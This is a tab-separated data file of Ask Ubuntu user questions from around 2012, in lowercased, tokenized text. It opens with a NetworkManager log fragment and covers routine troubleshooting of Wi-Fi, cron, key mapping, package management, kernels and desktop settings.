-- protocol udp -- destination-port 67 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- in-interface wlan0 -- jump reject apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- out-interface wlan0 -- jump reject apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- in-interface wlan0 -- out-interface wlan0 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- source 10.42.43.0/255.255.255.0 -- in-interface wlan0 -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table filter -- insert forward -- destination 10.42.43.0/255.255.255.0 -- out-interface wlan0 -- match state -- state established , related -- jump accept apr 1 23:32:01 networkmanager [ 901 ] : < info > executing : /sbin/iptables -- table nat -- insert postrouting -- source 10.42.43.0/255.255.255.0 ! -- destination 10.42.43.0/255.255.255.0 -- jump masquerade apr 1 23:32:01 networkmanager [ 901 ] : < info > starting dnsmasq ... apr 1 23:32:01 networkmanager [ 901 ] : < info > activation ( wlan0 ) stage 5 of 5 ( ip configure commit ) complete . apr 1 23:32:01 networkmanager [ 901 ] : < info > activation ( wlan0 ) stage 4 of 5 ( ip6 configure timeout ) complete . apr 1 23:32:01 networkmanager [ 901 ] : < warn > dnsmasq died with signal 9 apr 1 23:32:01 networkmanager [ 901 ] : < info > ( wlan0 ) : device state change : activated - > failed ( reason 'sharing-start-failed ' ) [ 100 120 18 ] apr 1 23:32:01 dnsmasq [ 4235 ] : started , version 2.57 cachesize 150 apr 1 23:32:01 dnsmasq [ 4235 ] : compile time options : ipv6 gnu-getopt dbus i18n dhcp tftp idn apr 1 23:32:01 dnsmasq-dhcp [ 4235 ] : dhcp , ip range 10.42.43.10 -- 10.42.43.100 , lease time 1h apr 1 23:32:01 networkmanager [ 901 ] : < warn > activation ( wlan0 ) failed for access point ( reppify ubuntu ) apr 1 23:32:01 dnsmasq [ 4235 ] : reading /etc/resolv.conf apr 1 23:32:01 dnsmasq [ 4235 ] : using nameserver 220.226.6.104 # 53 apr 1 23:32:01 dnsmasq [ 4235 ] : using nameserver 220.226.100.40 # 53 apr 1 23:32:01 dnsmasq [ 4235 ] : cleared cache apr 1 23:32:01 networkmanager [ 901 ] : < warn > activation ( wlan0 ) failed . apr 1 23:32:01 networkmanager [ 901 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] apr 1 23:32:01 networkmanager [ 901 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] apr 1 23:32:01 dbus [ 885 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) apr 1 23:32:01 dbus [ 885 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' apr 1 23:32:01 networkmanager [ 901 ] : < error > [ 1333303321.565351 ] [ nm-device-wifi.c:1815 ] nm_device_wifi_set_mode ( ) : ( wlan0 ) : error setting mode 2
117972	session is restarted continuously ( ubuntu 11.10 )	this is my first question in ask ubuntu and sorry for my english ( it is not my native language ) . i have installed ubuntu 11.10 on my laptop and i have a problem that annoys me quite a lot . when i 'm working on my laptop , and without following the same behavior ( sometimes when i 'm using firefox , sometimes when i open a document , sometimes when i 'm working with eclipse ... ) , the session is restarted on its own suddenly , so i loose all my previous work . has anyone experimented this situation ? thanks in advanced .
117978	script does n't run via crontab but works fine standalone	i have a script that reminds me to restart my computer if uptime is more than , say 3 days ( although its set to 0 days now just to check if the script is running as my computer has been up only over a day.. ) . i realize it is n't the most elegant script but i am trying ! : ) # ! /bin/bash up= $ ( uptime | grep `` day '' > /home/dnaneet/uptime.foo & & awk < /home/dnaneet/uptime.foo ' { print $ 3 } ' ) [ [ $ up -gt 0 ] ] & & xmessage -center `` restart ! '' i have made it executable by chmod + x checkup.sh and it works fine when i run it fro the terminal via ./checkup.sh my crontab entry for this script is : 46 14 * * * /home/dnaneet/desktop/./checkup.sh so it runs at 14:46hrs daily ... so ... i am thinking it should run , unless i did n't something really silly . also , do you think it 's ok to move this bash script to /bin ?
117979	my laptop 's has a problem it getting to hot ( overheating ) .	i have installed ubuntu 11.10 , but my laptop has become slow and suffering from overheating problem . the laptop is a hp pavilion dv4 ( 2.3 ghz processor , 4 gb ram ) .
117981	user-level script run by lightdm	i 'd like to do key remapping that effects only my user , but everywhere within my window manager , not just in a terminal . in lightdm , i select awesome as my window manager and log in . are there any hooks for per-user configuration to do before the xserver starts ? .xinitrc and .xsession do n't seem to be run by lightdm . even better would be a solution requiring entry point that would do key remappings regardless of window manager , but it seems different window managers have different conventions of how to hook in .
117991	the disk drive for /tmp is not ready yet or not present	i found some entries with the same error message ( see above ) but none really applies to my problem . i 'm running a stable version of ubuntu 11.10 ( 64 bit , single boot ) on my laptop . at irregular intervals , my system slows down and/or freezes . most of the time it comes back after a while , while a few times there 's nothing else to do than pull the plug . after these freeze , but even without a prior freeze , i get the error message `` the disk drive for /tmp is not ready yet or not present '' , after which i usually choose to `` fix the errors '' automatically . then it reboots and gives me a menu whether i want to boot ubuntu in normal or recovery mode ( among other options ) . more recently , my update manager is not working anymore and compiz has been turned off ( not by me ) . obviously , this is quite annoying since i can not predict when and when my system freezes and/or gives me the error message ( see above ) during the boot-up process . does anyone have any ideas ? is the internal graphics card ( intel chip ) ? is it better to format the drive and install ubuntu anew ? i will be happy to provide you with more info ( partitions , hardware etc . ) ; just be so kind as to send me the how-to as well since i have no clue as far as shell commands go . many thanks in advance .
117992	change is key-mapping is not remembered in ubuntu 10.04	i have mapped my pagedown key to the return command on my keyboard as the original return key is broken . i used the following command [ i 'm using ubuntu 10.04 ] : xmodmap -e 'keycode 117=return' it works all right . however , it does not work after i restart the system . how to make the system remember this setting forever ?
118001	how to restart only missing/invisible mouse pointer/cursor ?	for some reason , the mouse pointer on my ubuntu 10.04 pc disappears after the computer is woken up from suspend . that pc is missing a keyboard , so i can fix this by logging via ssh , and issuing : sudo service gdm restart ... however , this basically restarts gnome , and will close any applications that may have been running . another way to solve this is to set up that pc as a synergy slave - and then move the mouse from the synergy master to the slave desktop ; this brings the mouse pointer back . is it possible to run some command , such that i do n't need to restart x ( or gdm ) but i 'll effectively restart the mouse pointer code ? then i could put this into a script on the desktop , and be able to recover the mouse pointer after suspend without needing a second machine ( even with the mouse pointer invisible , mouseovers on icons are still rendered , so i could target this icon ) .
118003	how can i port packages from opensuse to ubuntu ?	my question stems from the fact that i could use my synaptics clickpad perfectly in opensuse , but can not in ubuntu 12.04 . earlier versions also had problems . i got the xorg-x11-driver-input-7.6-41.38.2.src.rpm package from opensuse sources , however , make complains about a missing xorg-server package . i 'm not surprised , the names in ubuntu seem not exactly the same . since i have come across such problems where the solution exists , can anyone give me a good starting point on how to start porting and writing code for ubuntu ?
118005	what are the default layout settings in gnome-terminal ?	i want to replace gnome-terminal fully by lxterminal . i 've started by changing the default terminal emulator . so i ran sudo update-alternatives -- config x-terminal-emulator , and chose lxterminal . after that , i ran dconf-editor and went to org - gnome - desktop - applications - terminal and changed gnome-terminal to lxterminal and removed the -x in the exec arg part . the only problem though , is that by default , lxterminal does n't look like gnome-terminal . what are gnome-terminal 's default layout settings ? i 'm especially looking for the hexadecimal colour codes for both text and background .
118006	amd-v is not enable in virtualbox in amd apu	i am running dual core amd e450 apu . when i tried to run a 64-bit os that requires hardware virtualization using virtual-box it showed me an error `` amd-v is not enable '' . my amd processor should provide amd-v support . and i can find no option for amd-v in bios . how can i solve this problem ? how could i enable amd-v for my apu ? thanks in advance lscpu : - architecture : x86_64 cpu op-mode ( s ) : 32-bit , 64-bit byte order : little endian cpu ( s ) : 2 on-line cpu ( s ) list : 0,1 thread ( s ) per core : 1 core ( s ) per socket : 2 socket ( s ) : 1 numa node ( s ) : 1 vendor id : authenticamd cpu family : 20 model : 2 stepping : 0 cpu mhz : 1650.000 bogomips : 3291.72 virtualization : amd-v l1d cache : 32k l1i cache : 32k l2 cache : 512k numa node0 cpu ( s ) : 0,1 edited : - error of virtualbox : - failed to open a session for the virtual machine xxx . amd-v is disabled in the bios . ( verr_svm_disabled ) . result code : ns_error_failure ( 0x80004005 ) component : console interface : iconsole { 1968b7d3-e3bf-4ceb-99e0-cb7c913317bb }
118010	how do i reboot ubuntu ?	i 'm new to ubuntu and i 'm not familiar with some settings . how do i restart/reboot the system so that i can have the option to use windows 7 in a dual boot .
118015	where is /usr/share/zoneinfo specified ?	we are adding timezone support to our ubuntu application . the time zone info on my machine is in /usr/share/zoneinfo . is it always in that directory ? if so , where is that specified ? if not , is there system call similar to `` gettimeofday ( 2 ) '' that i can make to find out where it is ? thanks in advance .
118023	wireless connection with an atheros ar9285 keeps dropping every 20 minutes	there are other questions on this but none have been taken very far in their analysis . i get disconnects very often - sometimes every 20 mins or so , but sometimes even every few minutes . the way i have been getting around it is to disconnect from the wifi connection and reconnect - and then it works fine again until the next disconnect . i am running ubuntu 11.04 on an asus a52f . can anyone help me please ? edit : my investigations have led me to believe this might be the router , as the same problem is duplicated on my gf 's htc smartphone . any ideas of how to solve ? output of lspci | grep -i net 02:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) 04:00.5 ethernet controller : jmicron technology corp. jmc250 pci express gigabit ethernet controller ( rev 03 )
118025	bypass the yes/no prompt in apt-get upgrade	in order avoid typing out all of the apt-get commands when updating my computer i have made a simple alias command to do it . but i really want to be able to just type in my alias and let it do its thing and not have to wait to for the yes/no prompt to type in `` y '' . is there a simple way to bypass this prompt or maybe add `` yes '' in the alias somewhere ?
118030	how to connect to wireless and wifi ?	i was using my netbook and the system froze , when i try to connect again to the internet via wireless it didnt go thru , try to reboot the system and others and it still dont work via wireless , also , i cant connect to any free available wifi signals . can somebody help me to solve this ? thanks for any help , ariel .
118035	problems with wired connection . help ?	it randomly stops working as i 'm working off a laptop , i click the option `` auto ethernet '' but it wo n't connect to the network again , i have to restart my laptop and then everything works fine but the connection eventually drops . i think it was after some update that i did , i am using 11.10 .
118041	repeated request for wireless password , no wireless connection	whenever i try to connect to a wireless network , ubuntu ( 11.10 ) asks for the password . when i enter this it thinks for a couple of minutes , then asks for the password again . this happens repeatedly . ( it is n't a problem with the wireless modem itself , as i can connect to wireless from the windows 7 opererating system i have running along side ubuntu . if anyone has any ideas about how to fix this they would be much appreciated ! thanks
118044	install/running ubuntu on external hdd with a windows laptop ?	sorry for asking , especially as i 've trawled through many similar questions . mine is of the most basic element i think as this kind of thing is really out of my ball park . anyway i wanted to if by installing ubuntu on my old laptop hdd ( i now use it as external storage ) , can i run it on my laptop which has windows installed . i ca n't take the chance of installing on the laptop as i 'm currently studying , and i have a years worth of work on here ( most backed up elsewhere ) , and will be using it a lot . however there are some programs i can use if i can get ubuntu that will be helpful for one or two classes .
118045	getting yuvmotionfps working on 64-bit ubuntu	i 'm trying to get yuvmotionfps ( http : //jcornet.free.fr/linux/yuvmotionfps.html ) working on ubuntu 11.10 64-bit . when i configure it normally i get errors saying `` videodev.h not found '' someone here said he managed to get it installed : http : //crazedmuleproductions.blogspot.com/2010/08/building-cincv-from-source-ubuntu-32.html ? showcomment=1282346714442 # c7687855630832861436 when i follow these steps i still get the same errors , apparently videodev.h is depreciated so i tried replacing instances of it with videodev2.h . it would configure but not make saying `` your does not even support `` i386 '' for '-march ' and '-mcpu ' '' . is it possible to get it working for 64-bit ubuntu or am i wasting my time ? thanks for any help you can give .
118051	do n't have desktop icons lock to grid	i am building a mythbuntu media center , the display being a 42 '' television . i set the text and desktop icons to be extremely large so they are readable from the couch . this is good , but all of the icons align to the top of the screen , and because the icon size is so large i ca n't have them move down one position . i am a perfectionist a this bothers me . does anyone know how to tell xfce to not snap desktop icons to a grid ? any help is greatly appreciated .
118054	web browser for large screen	i have a mythbuntu media center set up being displayed on a 42 '' screen . i have chromium as the browser , and you can not browse from the couch because the address bar as the icons are very small . does anyone know of a web browser that works in ubuntu that is designed for a large display ? thanks .
118062	ubuntu apt-get install linux-image	i 'd like someone to enlighten me as to what exactly goes on with aptitude when i want a kernel . as we all know , there 's pretty much the following kernel option : linux-image-generic linux-image-server linux-image-virtual this morning i did an install and it had linux-image-generic on it , so i ran the following : apt-get -y remove linux-image-* this removed all my kernels as expected , i followed suit with running : apt-get install linux-image-virtual says i 've installed linux-image-server ! ? am i missing something here , because i checked twice and it did it twice , however if i manually select a kernel ( in my instance i used : linux-image-2.6.35-30-virtual ) it will install linux-image-virtual . this seems rather strange to me ? details : running ubuntu 9.10 am i missing something ? : )
118066	keyboard shortcut for switching lenses	it used to be that i could switch to another lens by using the tab button in 11.10 but it seems that the key has been mapped to focusing different sections of the same lens in 12.04 . is there a new shortcut assigned to switching lenses in 12.04 ?
118069	every gnome shell themes i use - renders the search unusable	i 've downloaded the gnome-shell theme extention . using the default theme has no problem , but as soon as i try using one of the themes , clicking the `` windows '' key , then writing something to start searching for it , and the x server gets stuck . i 'm using ubuntu 10.11 , with gnome shell verion 3.2.2 thanks for your help yair
118070	hybrid graphics - msi fx420	i have a msi fx420 with intel hd graphics 3000 and hd radeon 6470m . on windows i can switch the card , but on ubuntu i think it only runs on radeon and drain all the battery . is there a way to possible disable the radeon and use only the intel hd on ubuntu ? if you need any more information , just ask .
118076	how can i set up zotero to use ubuntu one 's storage instead of zotero.org 's ?	i use zotero to organize papers and sync between my home and work computers . i 've got enough papers that zotero 's 100mb free limit is looming . is there a way to retarget zotero to use ubuntu one 's cloud storage instead of zotero 's ?
118077	is there an application or method to log of data transfers ?	my friend asked me for some files that i let him take from my system . i did not see he doing that . then i was left with a doubt : what extra files or data did he take from my system ? i was thinking is here any application or method which shows what data is copied to which usb ( if name available then shows name or otherwise device id ) and what data is being copied to ubuntu machine . it is some like history of usb and system data . i think this feature exists in kde this will really useful in may ways . it provides real time and monitoring utility to monitor usb mass storage devices activities on any machine .
118080	should i run ubuntu 64bit on a laptop with 2gb of ram ?	i 'm using an asus k43e laptop with : - intel core i3 sandy bridge 2.1ghz - 2gb ddr3 - onboard graphics on the ubuntu download page , the 32bit version is marked as `` recommended '' , but the community documentation page suggests otherwise : unless you have specific reasons to choose 32-bit , we recommend 64-bit to utilise the full capacity of your hardware . i use my laptop mostly for eclipse , apart from regular office applications , then does it make any difference when choosing between 32bit and 64bit ?
118087	will there be a new lock screen for 12.04 ?	i have read in many blogs that old lock screen is replaced by new lock screen in ubuntu 12.04 but when i installed 12.04 beta 2 ( and updated my system ) , its still showing old lock screen . any idea if its delayed ?
118094	not enough disk space '/ ' in aws instance	i am running ubuntu 11.04 instance for my web server on aws cloud , now i am getting there is no disk space in / partition of my server . df -ah say this filesystem size used avail use % mounted on /dev/xvda1 7.9g 7.8g 97m 99 % / proc 0 0 0 - /proc none 0 0 0 - /sys fusectl 0 0 0 - /sys/fs/fuse/connections none 0 0 0 - /sys/kernel/debug none 0 0 0 - /sys/kernel/security none 3.7g 112k 3.7g 1 % /dev none 0 0 0 - /dev/pts none 3.7g 0 3.7g 0 % /dev/shm none 3.7g 80k 3.7g 1 % /var/run none 3.7g 0 3.7g 0 % /var/lock /dev/xvdb 414g 16g 377g 4 % /mnt now i have tried these thing for getting some extra space on / partition clean up all log files for apache . removed all unnecessary files from server . home directory cleanup . but still i am not getting enough space . this instance type is m1.large with 8gb ebs . now i am getting i have enough disk space in /dev/xvdb . is there a way i can allocate some diskspace to / from /dev/xvdb or any other ways . please suggest me the possible solution for this.is it possible to use the same /dev/xvdb partition with another instance .
118107	really broken mysql setup	i have been having trouble with my mysql setup . this morning it was a working mysql server i added a database and some data with phpmyadmin then things started to go wrong . i became unable to connect getting error 2002 unable to connect to socket . i have completley unistalled mysql server ( as best i can ) and deleted database files . and now i can not reinstall it . i get a dpkg error `` post-instalation script returned error exit status 1 '' . running dpkg-reconfigure reports that `` mysql-server-5.1 is broken or not fully installed '' how do i find out what it is looking for ? the only thing i have removed is the mysql-server packages , i did install vsftpd at some point shortly before mysql stopped woking , is this known to break mysql ? ? any thoughts apreciated
118111	pc wo n't start after installing the latest version of ubuntu	my pc wo n't start after installing the latest version of ubuntu . i press the button to start the pc and then i see the bios start , but after that i get a black screen and nothing is happening . i ca n't even reinstall windows 7 or choose between windows 7 and ubuntu . please help . i do n't want to pay for fixing this . i do n't remember the hardware , and since i ca n't access windows 7 , i ca n't tell you . the only thing that i know is that it is an hp compaq 500bmt .
118115	really strange system failure	i started to use linux ubuntu not a while ago and i am already addicted to it . i really liked programming c++ via the terminal , ( ya know 3 terminals and dual screens all that makes you feel like a pro ) but recently i do n't know what happened , a lot of strange things happened to my os - when i boot , i only get my wallpaper ( no icons and no nothing ) when i use the dual screens i get a very weird error , i googled it out and found that i must edit something like /etc/x11/conf or something like that . the screen started to gim me some strange lines and even blackness sometimes , i think its due to my vga driver . and sometimes when i shut down i get a message saying not enough memory . i am running ubuntu on my toshiba satalite l650 core i3 , 2 gigs ram , 1 gig vga ati . all i want is just to get to gain access to my hdd because there are a lot of important things that i do n't wan na lose . i would really appreciate some help , thanks in advance
118116	will upgrading ubuntu kernel to a newer downgrade the old kernel ?	i have an ubuntu desktop 11.10 64 bit upgraded from 11.04 , with kernel 3.3.0 generic installed from packages . i plan to upgrade automatically to 12.04 lts . i saw in the release info that the official kernel will be 3.2 ( which is the stable one ) . will upgrading `` downgrade '' my kernel ? is it actually possible to perform this upgrade ?
118118	connecting ubuntu with 7 via network cable	i was tryin to connect my ubuntu toshiba satalite l650 laptop with my desktop via a network cable so that i can share things and remotely control the desktop from the laptop , i googled the problem out and found a guide page , i followed all the steps , i installed samba , i had the two computer have the same workgroup name , i had everything correct , but i still dont see connection estbalished between the two computers , ( neither one is visible to the other ) what is missing ? thanx in advance .
118123	problem with rpm to deb conversion by using alien	i am facing problem with installing my laptop drivers which are in rpm package . i have tried to install them bu using 'alien ' , but unfortunately that did not work . it is generating warning when i convert the package.rpm into package.deb : rashid @ rashid-laptop : ~/desktop $ sudo alien -- script -k ras.rpm warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > warning : ras.rpm : header v3 rsa/sha256 signature : nokey , key id 307e3d54 < br > unpacking of 'ras.rpm ' failed at /usr/share/perl5/alien/package/rpm.pm line 153 .
118124	make a deb repository from packages installed in one server	i have to servers , the main of them , called server1 is a working ubuntu server , with some packages hold in some version , and some of them compiled from deb-src too . i want to make a local repository with the packages installed in server1 , to replicate over my network , then if i wanted to install postgresql ( with my own changes , just as it is in server 1 ) in server2 , i could get the package from my local repo compiled and versioned just in the exact way i installed in server1 im thinkin / searching in some kind of script just after install one deb ( from official repo , or local compiled ) which will rsync to my local repo server . but i dont know if it is posible or there is another cleaner way to get it . thanks a lot .
118132	unable to play proprietary media formats even after installing restricted extras	i have installed ubuntu 12.04 . i am unable to play proprietary media formats on ubuntu precise even after installing ubuntu-restricted-extras . i am using totem and rhytmbox as my players .
118134	how do i fix my laptop screen from being blank until the computer warms up ?	my new ( just three days old ) dell inspiron n4050 's screen is n't working . when i press the power button , the fans start running , and i hear sounds related to logging in , but the screen remains blank . after about 45 minutes , the screen will turn on , and act normally . if i reboot the computer , it continues working , but if i turn the computer off and let it cool off , the same thing will happen . i 've noticed that when the laptop heats up , it shows everything , but upon cooling , the screen remains blank . how do i fix this ?
118138	iterm 2 equivalent	is there an iterm2 ( terminal application for mac os ) equivalent for ubuntu ? amongst the many features it adds the one i 'm after is the `` hotkey window '' , where you can overlay/hide a translucent terminal window at the touch of a button on the keyboard .
118140	unaligned aio/dio	i am getting this error on my ubuntu server installation : kernel : [ 6622929.119915 ] ext4-fs ( sda1 ) : unaligned aio/dio on inode 43648079 by java ; performance will be poor . is this a kernel bug ? how do i fix it ?
118143	fixing dpkg after installation of broken packages ?	i installed a broken package , and now apt-get/aptitude is failing with trying to remove it each time i run a apt operation , this is the message i get : removing crossplatformui ... ztemtvcdromd : no process found dpkg : error processing crossplatformui ( -- remove ) : subprocess installed post-removal script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : crossplatformui e : sub-process /usr/bin/dpkg returned an error code ( 1 ) running sudo apt-get install -f gives me this : amith @ amith-desktop : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : crossplatformui 0 upgraded , 0 newly installed , 1 to remove and 1123 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 340804 files and directories currently installed . ) removing crossplatformui ... ztemtvcdromd : no process found dpkg : error processing crossplatformui ( -- remove ) : subprocess installed post-removal script returned error exit status 1 errors were encountered while processing : crossplatformui e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how do i fix this ?
118148	how to install monitorx ?	i followed a tutorial at unixmen on how to install monitorx in ubuntu i installed the dependencies and downloaded the monitorix_2.5.0-izzy1_all.deb deb package but when i try to install it i get this error google transtaler ( i have a dutch ubuntu and so was the error message ) dpkg : error processing monitorix_2.5.0-izzy1_all.deb ( - install ) : parsing file '/ var / lib / dpkg / tmp.ci / control ' near line 14 package 'monitorix ' : blank line in the value of field 'description' errors were encountered while processing : monitorix_2.5.0-izzy1_all.deb my question is how to get monitorx up and running in ubuntu 11.10 amd64
118149	how can i uninstall unity in 12.04 and install cinnamon ?	i decided to install cinnamon , as it 's by far superior than unity in my opinion . however , i do n't know from where to install it .
118151	how do i disable window move with alt + left mouse button in gnome shell ?	there are lots of posts on this about unity , this is about gnome-shell as with other posters , i use apps ( inkscape in particular ) that uses alt-click and alt-drag . gnome-shell is grabbing this off me and thus disabling features in the application . i have tried using ccsm 's move plugin - you can turn this off and you still get alt-drag window moving . using gconf editor to change /apps/metacity/general/mouse_button_modifier - this has no effect afaics . it 's really hindering me . otherwise i find gnome-shell a really productive environment .
118152	static application switcher is empty after show dekstop	im using the static application switcher to configure my alt + tab to cycle trough all applications not grouped . so far so good . then i press super + d to `` hide all normal windows '' ( show desktop ) . this setting is from keyboard - > shortcuts - > navigation . this also works but after hide all normal windows has been activated and i press alt + tab nothing comes up . i suspect they have been hidden so well that the application switcher does not longer sees them . anyone know if this can be fixed trough settings somewhere ?
118153	detailed quickly tutorial	hi i kindly need a more detailed quickly tutorial that explain the python code./ for example , adding a login form to an application
118154	how to put dash button on dockbarx	im new in ubuntu so i need help from pros i like the dash feature but i do n't like the unity launcher how can i make a dash button on `` dockbarx '' addition : how to remove the unity launcher
118158	upgrading gnome 3.4 in 12.04 using individual packages	how can i install gnome 3.4 without performing a whole sudo apt-get upgrade ? what are the packages i need to install ?
118161	application for resizeing and reducing dimensions of a given image precisely ?	i was creating themes for nokia phones on 11.10 so i need an application to reduce the dimensions and size of a given image precisely , say x-kb and x*y dimensions , is there any such application ? , help needed .
118162	unable to create directory in ubuntu 10.04	when i try to run mkdir new i get the error , bash : cd : new : no such file or directory as far as i remember , i have n't changed any file permissions.so what could be the reason for this . ubuntu 10.04 update : $ whereis mkdir mkdir : /bin/mkdir /usr/share/man/man1/mkdir.1.gz /usr/share/man/man2/mkdir.2.gz $ whereis cd cd : o/p for ls -la total 68 drwxr-xr-x 13 comp comp 4096 2011-06-15 20:01 . drwxr-xr-x 43 comp comp 4096 2012-04-02 16:09 .. drwxr-xr-x 6 comp comp 4096 2011-06-15 20:01 app drwxr-xr-x 5 comp comp 4096 2011-06-15 20:01 config drwxr-xr-x 2 comp comp 4096 2011-06-15 20:01 db drwxr-xr-x 2 comp comp 4096 2011-06-15 20:01 doc drwxr-xr-x 3 comp comp 4096 2011-06-15 20:01 lib drwxr-xr-x 2 comp comp 4096 2011-06-15 20:01 log drwxr-xr-x 5 comp comp 4096 2011-06-15 20:01 public -rw-r -- r -- 1 comp comp 307 2011-06-15 20:01 rakefile -rw-r -- r -- 1 comp comp 10011 2011-06-15 20:01 readme drwxr-xr-x 3 comp comp 4096 2011-06-15 20:01 script drwxr-xr-x 7 comp comp 4096 2011-06-15 20:01 test drwxr-xr-x 6 comp comp 4096 2011-06-15 20:01 tmp drwxr-xr-x 3 comp comp 4096 2011-06-15 20:01 vendor
118163	why do some of my mp3 's have album cover icons and some not in nautilus ?	why do some of my mp3 's have album cover icons and some not in nautilus ? how can i download the album covers and view it in the .mp3 file ?
118165	error with program.csh ( bin/csh : bad interpreter : no such file or directory )	i 've installed a program from nasa , that use a csh command but i got the following error : $ do_ledaps.csh l71124049_04920000912_mtl.txt bash : /home/j/documents/ledapstool/ledapssrc/bin/do_ledaps.csh : /bin/csh : bad interpreter : no such file or directory any idea what can be wrong ? the 4 submodules of the program work fine all of them , but this command to run all of them at once does not work . i 've also already set up the environment defining the export path in the ~/.bashrc : export path=/home/j/documents/ledapstool/ledapssrc/bin : $ path export anc_path=/home/j/documents/ledapstool/ledapsanc
118171	how can i remove gnome from a kubuntu 12.04 install ?	i have a kubuntu 12.04 system to which i added gnome ( unity ) but i 'm now wanting to remove gnome as i do n't think i 'll ever use it . doing apt-get remove ubuntu-desktop does n't remove the packages , so how can i safely remove all the gnome components ? i do n't really want to do a clean install if i can avoid it .
118175	how do i suppress the confirmation dialogue when ending a session ?	i currently using an old pc with ubuntu 11.10 . when i want to restart ( or turn off ) the system ubuntu always ask me for confirmation . i want to force it to perform immediately and do n't want to see any confirmation dialogue anymore . how can i suppress that ?
118182	who created the default ubuntu wallpaper ?	who created the default ubuntu wallpaper ? i mean the wallpaper displayed at this link . it is beautiful and i am curious : was it mark shuttleworth himself ?
118185	ubuntu one stream/download rest api calls lead to 404	i successfully use the music rest api to fetch cover art , artists and albums , and songs . but if i want to to use rest/download.view or rest/stream.view i get a 404 and the content is a html page . the id i put on the request is fetched before with the api . it has the form : egde : the url i call looks like https : //one.ubuntu.com/music/rest/download.view ? u=x & p=x & v=1.2.0 & c=bla & id=egde % 3a i make a get call . in case of a error it should return the content type `` text/xml '' but it is `` text/html '' so it seems the url is n't known by the server . what do i wrong and how can i obtain a stream or the file for download via the music rest api ?
118188	multitouch trackpad gestures dell xps 15	i 'm trying to enable some multitouch gestures to mirror what os x is capable of doing , such as brushing three fingers across the trackpad to switch desktops , swiping two fingers to navigate back in nautilus or firefox etc . i 'm trying to use touchegg , but i 'm not sure if ubuntu sees my trackpad as a device with more than two finger support . two finger scrolling works fine . does touchegg work in ubuntu 12.04 ? how can i find out if my trackpad ( dell xps l502x ) supports 3+ finger support in ubuntu ? are there any compiz plugins that might help ? i have a friend who is trying to achieve the same thing on his sony vaio , because he can do most of the aforementioned gestures in windows . thanks for any help !
118189	can i use a newer ubuntu version with an older kernel version ?	reasons for this is cause an app i use supports only older kernel versions.and i need newer ubuntu versions cause they 're supported ( still have repos ) and support for gnome shell.i currently use ubuntu 10.04 .
118191	apt-get failed to fetch from ubuntu server with error code 404	i just updated from 10.04 to oneiric and now i can not use my apt-get anymore . when i do i got the following error : ign http : //security.ubuntu.com oneiric-security inrelease ign http : //archive.ubuntu.com oneiric inrelease ign http : //archive.ubuntu.com oneiric-updates inrelease ign http : //security.ubuntu.com oneiric-security release.gpg ign http : //archive.ubuntu.com oneiric release.gpg ign http : //security.ubuntu.com oneiric-security release ign http : //archive.ubuntu.com oneiric-updates release.gpg ign http : //archive.ubuntu.com oneiric release ign http : //archive.ubuntu.com oneiric-updates release ign http : //security.ubuntu.com oneiric-security/main translationindex ign http : //security.ubuntu.com oneiric-security/multiverse translationindex ign http : //security.ubuntu.com oneiric-security/restricted translationindex ign http : //archive.ubuntu.com oneiric/main translationindex ign http : //security.ubuntu.com oneiric-security/universe translationindex ign http : //archive.ubuntu.com oneiric/multiverse translationindex ign http : //archive.ubuntu.com oneiric/restricted translationindex ign http : //archive.ubuntu.com oneiric/universe translationindex ign http : //archive.ubuntu.com oneiric-updates/main translationindex ign http : //archive.ubuntu.com oneiric-updates/multiverse translationindex ign http : //archive.ubuntu.com oneiric-updates/restricted translationindex ign http : //archive.ubuntu.com oneiric-updates/universe translationindex err http : //security.ubuntu.com oneiric-security/universe amd64 packages 404 not found err http : //security.ubuntu.com oneiric-security/main amd64 packages 404 not found err http : //security.ubuntu.com oneiric-security/restricted amd64 packages 404 not found err http : //security.ubuntu.com oneiric-security/multiverse amd64 packages 404 not found err http : //security.ubuntu.com oneiric-security/universe i386 packages 404 not found err http : //security.ubuntu.com oneiric-security/main i386 packages 404 not found err http : //security.ubuntu.com oneiric-security/restricted i386 packages 404 not found err http : //security.ubuntu.com oneiric-security/multiverse i386 packages 404 not found ign http : //security.ubuntu.com oneiric-security/main translation-en_us ign http : //security.ubuntu.com oneiric-security/main translation-en ign http : //security.ubuntu.com oneiric-security/multiverse 